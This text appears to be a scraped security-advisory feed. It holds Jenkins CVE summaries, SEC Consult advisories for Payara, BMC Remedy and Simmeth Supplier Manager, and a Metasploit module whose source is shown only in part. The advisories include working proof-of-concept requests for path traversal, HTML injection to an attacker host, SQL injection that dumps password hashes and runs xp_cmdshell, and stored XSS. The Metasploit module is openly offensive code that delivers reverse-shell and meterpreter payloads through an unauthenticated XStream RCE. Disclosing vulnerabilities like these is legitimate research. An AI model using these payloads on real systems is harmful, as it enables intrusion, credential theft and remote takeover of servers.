A missing permission check in Jenkins CloudBees Docker Hub/Registry Notification Plugin 2.6.2 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.

CVE-2022-45385: Jenkins Security Advisory 2022-11-15

Jenkins Reverse Proxy Auth Plugin 1.7.3 and earlier stores the LDAP manager password unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by attackers with access to the Jenkins controller file system.

CVE-2022-45384: Jenkins Security Advisory 2022-11-15

Jenkins CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45395: Jenkins Security Advisory 2022-11-15

Jenkins Naginator Plugin 1.18.1 and earlier does not escape display names of source builds in builds that were triggered via Retry action, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to edit build display names.

CVE-2022-45382: Jenkins Security Advisory 2022-11-15

Payara Platform suffers from a path traversal vulnerability. Enterprise versions prior to 5.45.0 and Community versions prior to 6.2022.1, 5.2022.4, and 4.1.2.191.38 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20221114-0 >  
=======================================================================  
               title: Path Traversal Vulnerability  
             product: Payara Platform  
  vulnerable version: Enterprise: <5.45.0  
                      Community: <6.2022.1, <5.2022.4, <4.1.2.191.38  
       fixed version: Enterprise: 5.45.0  
                      Community: 6.2022.1, 5.2022.4, 4.1.2.191.38  
          CVE number: CVE-2022-45129  
              impact: High  
            homepage: https://www.payara.fish  
               found: 2022-09-29  
                  by: Michael Baer (Office Nuremberg)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Payara Micro Community is the open source, lightweight middleware platform of choice  
for containerized Jakarta EE application deployments. less than 70MB, Payara Micro  
requires no installation, configuration, or code rewrites."

Source: https://www.payara.fish/products/payara-platform-community/

Business recommendation:  
------------------------  
The vendor provides an update for the affected versions which should be installed  
immediately.

SEC Consult highly recommends to perform a thorough security review of the  
Payara Software by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Path Traversal Vulnerability (CVE-2022-45129)  
A path traversal similar to the old CVE-2021-41381 allows, under some circumstances,  
to bypass the protection of the WEB-INF/ and META-INF/ folders. It is possible to read  
files inside these directories of the deployed application. They mostly  
contain configuration files for the application but may also contain source code.

Proof of concept:  
-----------------  
1) Path Traversal Vulnerability (CVE-2022-45129)  
a) (Setup)  
Deploy a web application at the root context (/). For this PoC,  
the following application was used: https://github.com/AKSarav/SampleWebApp  
===============================================================================  
java -jar ./appserver/extras/payara-micro/payara-micro-distribution/target/payara-micro.jar --port 1234 --deploy app.war --contextroot /  
===============================================================================  
This application uses the org.apache.catalina.servlets.DefaultServlet for serving files.  
The deployment at root (/) is crucial. The webapp has the following structure:  
.  
├── WEB-INF  
│   ├── web.xml  
│   └── weblogic.xml  
├── META-INF  
│   └── context.xml  
├── index.html  
└── welcome.jsp

b) (Attack)  
The attacking payload is an HTTP request with a path starting with ../<webapp-name>/  
(note that it does not start with /). To issue this request, a netcat connection can  
be used:  
===============================================================================  
$ nc localhost 1234  
GET ../app/WEB-INF/web.xml HTTP/1.1  
Host: abc

===============================================================================  
The server's response:  
===============================================================================  
HTTP/1.1 200 OK  
Server: Payara Micro #badassfish  
Accept-Ranges: bytes  
ETag: W/"688-1664529724289"  
Last-Modified: Fri, 30 Sep 2022 09:22:04 GMT  
Content-Type: application/xml  
Content-Length: 688  
X-Frame-Options: SAMEORIGIN

<?xml version="1.0" encoding="UTF-8"?>  
[...]  
===============================================================================  
It is possible to access all files in the app's directory /app.  
The issue arises because the leading ../ is not detected to  
escape the context and later the code of StandardContextValve.java  
only checks the beginning of the path for forbidden directories  
/META-INF/ and /WEB-INF/.  
===============================================================================  
requestPath.toUpperCase().startsWith("/META-INF/", 0)  
===============================================================================

Vulnerable / tested versions:  
-----------------------------  
The vulnerability has been found in version 5.2022.3 (using jdk8-openjdk 8.345.u01-1)  
and was verified as well on the Payara6 branch with the latest commit during the time  
of the test: e5f68cda7a72c0c15fb55b724fe5d2e1e6255510 (using jdk11-openjdk 11.0.16.1.u1-2).

In both cases, the application was self-compiled from the official GitHub repository  
on an Arch Linux distribution.

According to the vendor, "This vulnerability affects ALL the distributions of the  
Payara Platform (Server Full, Server Web, Micro, Embedded, Docker images)  
in every edition and major version.".

The vulnerable versions are all before 6.2022.1, 4.1.2.191.38, 5.2022.4 (Community Edition)  
and 5.45.0 (Enterprise Edition).

Vendor contact timeline:  
------------------------  
2022-10-05: Contacting vendor through security@payara.fish asking for encryption key.  
             Vendor agreed to proceed without encrypted channel.  
2022-10-06: Sent security advisory to vendor.  
2022-10-08: Vendor cannot reproduce vulnerability.  
2022-10-10: Sending additional / more detailed information.  
2022-10-12: Vendor confirms the vulnerability.  
2022-10-17: Contacting vendor to coordinate release date.  
2022-10-25: Vendor notifies that fix is applied and live in repository, we should wait  
             for marketing to put patch notes online.  
2022-11-02: Contacting vendor to ask for list of affected and fixed versions and CVE  
             number and whether marketing already sent out the information. No reply.  
2022-11-09: Identifying new version & patch notes are already available online.  
             Requesting CVE number through MITRE.  
2022-11-10: Sending CVE number to vendor  
2022-11-11: Informing vendor about public release date on 2022-11-14  
2022-11-14: Public release of security advisory.

Solution:  
---------  
The vendor fixed the software to detect illegal path traversals.  
The fixed versions are  
* 6.2022.1 (Community Edition)  
* 5.2022.4 (Community Edition)  
* 4.1.2.191.38 (Community Edition)  
* 5.45.0 (Enterprise Edition)

The Community Edition can be downloaded from the vendor's website:

https://www.payara.fish/downloads/payara-platform-community-edition/

The Enterprise Edition can be requested by the sales team of Payara.

Further information regarding the vulnerability and releases can be  
found at the following web site of the vendor:

https://blog.payara.fish/whats-new-in-the-november-2022-payara-platform-release

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer / @2022

Payara Platform Path Traversal

BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20221110-0 >  
=======================================================================  
               title: HTML Injection  
             product: BMC Remedy ITSM-Suite  
  vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)  
       fixed version: 22.1  
          CVE number: CVE-2022-26088  
              impact: Low  
            homepage: https://www.bmc.com/it-solutions/remedy-itsm.html  
               found: 2021-08-11  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix  
ITSM service provide out of-the-box IT Information Library (ITIL)  
service support functionality. Remedy ITSM Suite and BMC Helix ITSM  
service streamline and automate the processes around IT service desk,  
asset management, and change management operations. It also enables  
you to link your business services to your IT infrastructure to help  
you manage the impact of technology changes on business and business  
changes on technology — in real time and into the future. In addition,  
you can understand and optimize the user experience, balance current  
and future infrastructure investments, and view potential impact on  
the business by using a real-time service model."

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation:  
------------------------  
The vendor provides an updated version which should be installed immediately.

The vendor states that:  
 > We have done hardening in version 22.1.  
 > However, we do not agree with assigning the CVE to this vulnerability.  
 > As mentioned previously this is an informative vulnerability, and no real  
   impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or  
exfiltrate information.

Vulnerability overview/description:  
-----------------------------------  
1) HTML Injection (CVE-2022-26088)  
An authenticated attacker who can forward incidents per email is able to inject  
a limited set of HTML tags. This is accomplished by inserting arbitrary content  
into the "To:" field of the email. There is a filtering mechanism that prevents  
the injection of many HTML tags, for example <script>, and it also removes event  
handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the  
incident which states that $USER has sent an email to <X> recipients. Upon  
clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force  
the user's browser to make requests to his specified URL. This can be used to  
trigger actions on internal services via CSRF or exfiltrate information.

Proof of concept:  
-----------------  
1) HTML Injection (CVE-2022-26088)  
When an incident is viewed, there is a button which allows forwarding the  
incident by mail. After entering a TO address and the body of the email, it can  
be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing  
the 'Email.To.InternetEmail' parameter. The modified request is:

-------------------------------------------------------------------------------  
PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1  
Host: TARGET  
Cookie: […]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json;charset=utf-8  
X-Xsrf-Token: SOME_TOKEN  
Content-Length: ADAPT_AS_NEEDED  
Te: trailers  
Connection: close

{  
   "worknote": "pentest",  
   "access": true,  
   "Email.From.Person": {  
     "email": "SOME_SENDING_MAIL",  
     "fullName": "Pentest - SEC Consult",  
     "loginId": "USERNAME"  
   },  
   "Email.Subject": "SOME_SUBJECT",  
   "Email.Body": "test2",  
   "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",  
   "workInfoType": 16000  
}  
-------------------------------------------------------------------------------

The parameter Email.To.InternetEmail contains the payload. In this case an  
image tag containing the IP of the attacker was inserted:  
"<img src=http://LOCAL_IP:8001/>a@example.test"  
The a@example.test is needed to pass the email validation step and example.test  
was used to prevent sending out real emails.

After this step, the information that $USER has sent an email to 1 recipient  
will be appended in the activity log of this incident.

Now we start a local netcat listener with the command  
$ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser  
issues a request to our 'netcat' instance.

This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 9.1.10 this corresponds to version 20.02 as stated at the following URL:  
https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping

Vendor contact timeline:  
------------------------  
2021-09-07: Contacting vendor through email (appsec@bmc.com).  
2021-09-28: Vendor states that they did not get the first email.  
2021-09-29: Resending the advisory to their renewed GPG key.  
2021-10-29: Fix pending, request to delay publication.  
2021-11-18: Vulnerability is fixed and the fix is being evaluated.  
2022-01-17: Asking for a status update.  
2022-01-17: Vulnerability is fixed, no scheduled release.  
2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.  
2022-02-24: Fixed in Smart-IT 22.1, release postponed.  
2022-03-30: Release postponed to May 2022.  
2022-04-20: Asking if the fixed version will be released in May.  
2022-05-17: Asking if the fixed version will be released in May.  
2022-05-23: Release rescheduled to end of June/July  
2022-08-04: Asking for status  
2022-08-05: Product was released  
2022-08-31: Asking for link to update  
2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again  
2022-09-06: Vendor asks for final version of advisory  
2022-09-06: Asking vendor for a new GPG key because of expiry  
2022-09-07: Sending the final advisory to the vendor  
2022-09-12: Vendor will check the advisory and answer in 1 or 2 days  
2022-09-14: Vendor states that their application is not vulnerable to CSRF and  
             asks if other data could be leaked via the HTTP request  
2022-09-15: We clarify that their application does not seem to be vulnerable to  
             CSRF but the HTML injection allows CSRFing other applications in the intranet.  
             Also we did not have time to assess if other data besides User-Agent and the  
             client's IP can be leaked.  
2022-10-04: We request an update to the previous mail.  
2022-10-19: Vendor sticks to their own original impact analysis.  
2022-11-10: Public release of security advisory.

Solution:  
---------  
Upgrade to version 22.1 or later which can be downloaded at the vendor's page:  
https://www.bmc.com/support/resources/product-downloads.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2022

BMC Remedy ITSM-Suite 9.1.10 / 20.02 HTML Injection

Simmeth System GmbH Supplier Manager (Lieferantenmanager) versions prior to 5.6 suffer from authentication bypass, code execution, cross site scripting, information leakage, remote SQL injection, and various other vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20221109-0 >=======================================================================               title: Multiple Critical Vulnerabilities             product: Simmeth System GmbH Supplier manager (Lieferantenmanager)  vulnerable version: < 5.6       fixed version: 5.6          CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,                      CVE-2022-44015, CVE-2022-44016, CVE-2022-44017              impact: critical            homepage: https://www.simmeth.net               found: 2022-03-01                  by: Steffen Robertz (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"We are an innovative B2B software provider for supply chain management,especially in the areas of supplier management over the entire supplierlifecycle and quality control, supply chain key figures and reporting.Our medium-sized family business is a reliable, practice-oriented partner withan extraordinary wealth of experience: since 2002, our currently more than 70medium-sized and corporate customers have trusted our solutions and ourpragmatically oriented expertise."Source: https://www.simmeth.net/en/company/about-usBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.An in-depth security analysis performed by security professionals ishighly advised, to identify and resolve potential further critical securityissues.  Vulnerability overview/description:-----------------------------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)An attacker can inject raw SQL queries. By activating MSSQL features, theattacker is able to execute arbitrary commands on the MSSQL server.2) Faulty API Design (CVE-2022-44014)A faulty API design allows an attacker to fetch arbitrary SQL tables perdesign. This will leak all user passwords and MSSQL hashes.3) Local File Access (CVE-2022-44016)An attacker can download arbitrary files from the web server by abusing an APIcall.4) Leak of Simmeth's SMTP passwordA cleartext password for the email account "LM@simmeth.net" is leaked duringthe login process.5) Stored Cross-Site Scripting (CVE-2022-44012)An attacker can execute JavaScript code in the browser of the victim if a siteis loaded. The victim's encrypted password can be stolen and most likely bedecrypted.6) Authentication Bypass (CVE-2022-44013)An attacker can access multiple API calls without authentication. Thus, alloutlined attacks can be executed without knowing any valid credentials.7) Errors in Session management (CVE-2022-44017)Due to errors in the session management, an attacker can log back into avictim's account after the victim logged out. This is due to the credentials notbeing cleaned from the local storage after logout.8) Information DisclosureMultiple requests were giving verbose error messages. This helps an attacker infinding and abusing a vulnerability.Proof of concept:-----------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)Following API call can be used to execute arbitrary SQL queries via a subqueryor stacked query in the table name. Because of vulnerability 6, only a validusername is required to send the request.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------The POC above shows an example subquery, which will respond with the resultingdataset. Stacked queries will be executed, however, the results will not becontained in the web server's reply. The example query will dump the MSSQL passwordhashes.Further attacks include arbitrary file read with the following query:(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents)sub;--And code execution via the xp_cmdshell extended procedure:(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell'nslookup some.domain';--2) Faulty API Design (CVE-2022-44014)The API design allows the frontend to supply an arbitrary table name(called <TABLE NAME HERE> in the POC below) into the following request.Because of vulnerability 6, only a valid username is required to send therequest.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "<TABLE NAME HERE>",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------This is a fault by design, as the attacker has full control of the tablename. Therefore, an arbitrary table such as the user table(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.3) Local File Access (CVE-2022-44016)The "GetImages" API call can be abused to read arbitrary files from the filesystem. This is due to the API allowing to set the image path from thefrontend.By pointing the base path to C:\, all files can be accessed.Because of vulnerability 6, the request requires no credentials.-----------------------POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1Content-Length: 229[...]{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml"},},"ImagesPath":"C:\\","ListImageNames":[         "Windows\\win.ini",         "boot.ini",         "Windows\\system32\\eula.txt",         "Windows\\System32\\drivers\\etc\\hosts"]}--------------------The files are returned base64 encoded. Thus, even binary data can be extractedfrom the server.4) Leak of Simmeth's SMTP passwordThe following API call will return the current configuration. The configurationseems to contain cleartext credentials from Simmeth's SMTP server. Therequest does not require any credentials.-----------------POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1Content-Length: 70Content-Type: application/json{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",}}----------------The server responds with:---------------[...]"KPIIntro":{"IsAccessLog":true,"MailSettings":{"Host":"vwp4261.webpack.hosteurope.de","IsAuthentification":true,"IsSSL":false,"LoginName":"wp10481666-supply","Password":"K***********a","Port":"25","Sender":"LM@simmeth.net"[...]--------------Thus, an attacker could send phishing mails from an official Simmeth account.5) Stored Cross-Site Scripting (CVE-2022-44012)The following request can be used to store JavaScript code into the database. Itwill be fetched and executed in the victim's browser, once the site is visited.Because of vulnerability 6, only a valid username is required to send the request.--------------POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1Content-Length: 3311{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName":"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=xonerror=alert(document.domain)>test","Lie_ID":4167},[...]---------------The XSS can be used to steal the encrypted passwords from the local storage.As the API uses cleartext passwords with every request, it is most likelypossible to exfiltrate the passwords in cleartext as well.6) Authentication Bypass (CVE-2022-44013)All API calls start by supplying the Credential Object.----------------"Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "Password: "*********"     "System": "****"   },----------------However, the password can just be removed. It seems to be only checked on thelogin API call. Thus, all requests can be made with just a username. The testedenvironment contained a User called "simmeth".Most likely this is a default user and thus always available, lowering therequirements for authenticated requests even further.7) Errors in Session management (CVE-2022-44017)An attacker can abuse a session management vulnerability in order to log backinto a user account after the user logged out.The encrypted password and username saved in the local storage of theweb browser is not cleared on logout and always stays valid. Hence, only the stateof the frontend state changes and the user appears to be logged out.An attacker can force the frontend state back into the logged in state byvisiting: https://<your-host>/LMS/LM/#main8) Information DisclosureThe application replies with verbose error messages, when triggeringexceptions. This can help an attacker to gain knowledge about the backend andaid in the development of exploits.Entering e.g. a single apostrophe into the table name of vulnerability 2 willcause the web server to print a full stack trace as well as the rest of the SQLquery. Hence, the SQL statement can easily be updated to execute properly.Vulnerable / tested versions:-----------------------------The test was conducted in version 5.4 which was found to be vulnerable.Vendor contact timeline:------------------------2022-04-01: Contacting vendor through info@simmeth.net2022-04-01: Simmeth requested to know in which customer's environment the             vulnerabilities were discovered.2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already             contains fixes. SEC Consult requests the version number of the fixed version.2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per             unencrypted email.2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new             and currently being fixed.2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.             A new API will be created until the end of the year.2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take             until end of July.2022-09-02: Asking about CVE numbers and if all customers are patched.2022-09-05: Some customers are not yet patched. Current version is phased out by the             end of september. All customers will have to upgrade until then. SEC Consult             will request CVE numbers.2022-10-05: Requested status update.2022-10-17: All customers are updated.2022-11-09: Coordinated release of security advisory.Solution:---------The vendor provides a patched version 5.6 which fixes the identifiedsecurity issues. Please approach your vendor support contact in order to receivethe patches.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF S. Robertz / @2022

Simmeth System GmbH Supplier Manager LFI / SQL Injection / Bypass

VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to remote command injection. This Metasploit module exploits the vulnerability to upload and execute payloads gaining root privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware NSX Manager XStream unauthenticated RCE',        'Description' => %q{          VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),          a malicious actor can get remote code execution in the context of 'root' on the appliance.          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13          are vulnerable to Remote Command Injection.          This module exploits the vulnerability to upload and execute payloads gaining root privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y', # metasploit module author          'Sina Kheirkhah', # Security researcher (Source Incite)          'Steven Seeley' # Security researcher (Source Incite)        ],        'References' => [          ['CVE', '2021-39144'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],          ['URL', 'https://kb.vmware.com/s/article/89809'],          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],          ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']        ],        'DisclosureDate' => '2022-10-25',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :in_memory,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'curl', 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def check_nsx_v_mgr    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login.jsp')    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  def execute_command(cmd, _opts = {})    b64 = Rex::Text.encode_base64(cmd)    random_uri = rand_text_alphanumeric(4..10)    xml_payload = <<~XML      <sorted-set>        <string>foo</string>        <dynamic-proxy>          <interface>java.lang.Comparable</interface>          <handler class="java.beans.EventHandler">            <target class="java.lang.ProcessBuilder">              <command>                <string>bash</string>                <string>-c</string>                <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>              </command>            </target>            <action>start</action>          </handler>        </dynamic-proxy>      </sorted-set>    XML    return send_request_cgi({      'method' => 'PUT',      'ctype' => 'application/xml',      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),      'data' => xml_payload    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"  # that indicates the target is running VMware NSX Manager (NSX-V)  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable  def check    print_status("Checking if #{peer} can be exploited.")    res = check_nsx_v_mgr    return CheckCode::Unknown('No response received from the target!') unless res    html = res.get_html_document    html_title = html.at('title')    if html_title.nil? || html_title.text != 'VMware Appliance Management'      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')    end    